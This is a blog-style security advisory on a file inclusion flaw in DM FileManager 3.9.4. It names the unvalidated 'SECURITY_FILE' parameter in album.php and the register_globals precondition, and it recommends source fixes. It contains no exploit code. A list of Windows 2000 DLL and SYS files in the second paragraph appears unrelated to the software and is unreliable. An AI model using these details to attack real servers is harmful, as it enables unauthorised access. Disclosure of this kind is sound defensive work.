Managing The DM FileManager File Inclusion Vulnerability

It would be great if I had psychic powers and I was able to stop a vulnerability dead in its tracks before it crept up on us and made news headlines. Unfortunately I don't have psychic powers and I am here to tell you once again, about computer security vulnerability. This time a vulnerability has been reported in the DM FileManager. This vulnerability could prove disastrous and result in some scary consequences.

The DM file manager is the Dutchmonkey file management system. It allows users to manage, upload, change, share as well as use photos, videos and files online with extreme ease. They provide you with a fantastic online file management system which is geared for your web site. It is compatible with the majority of operating systems with the inclusion of Windows 2000. Some of the files for Windows 2000 may include but are not limited to the following: ~clbcatq.dll, 15_16wdm.sys,3cisaadi.sys, a1base.sys, bhp001.dll as well as c_eucdb.dll.

The vulnerability occurs when input is given to the "SECURITY_FILE" parameter. This is in dm-albums/template/album.php and is not verified with accuracy prior to being used in order to include files. This may be exploited by malicious characters to include an arbitrary code file from either external or local resources. In order for exploitations to be carried out with a basic level of success, it is imperative that "register_globals" is enabled. Another impact of this vulnerability includes being able to access systems without requiring the usual authorization necessary under normal circumstances.

The question that may be asked is: Which versions of DM FileManger does this vulnerability affect? This vulnerability has actually been confirmed in the version 3.9.4. All users need to be aware of the factor that it is highly possible that other versions may also be affected. Now I'm sure you are wondering: What is the solution? The solution to this vulnerability is for all users to go as far as editing the source code, in order to adequately make sure that the input is verified in the correct manner. It has also been suggested that in conjunction with editing the source code, it is vital to also disable the "register_globals" in php.ini. I would like to quote in conclusion: In theory, one can build provably secure systems. In theory, theory can be applied to practice but in practice, it can't. - M. Dacier, Eurecom Institute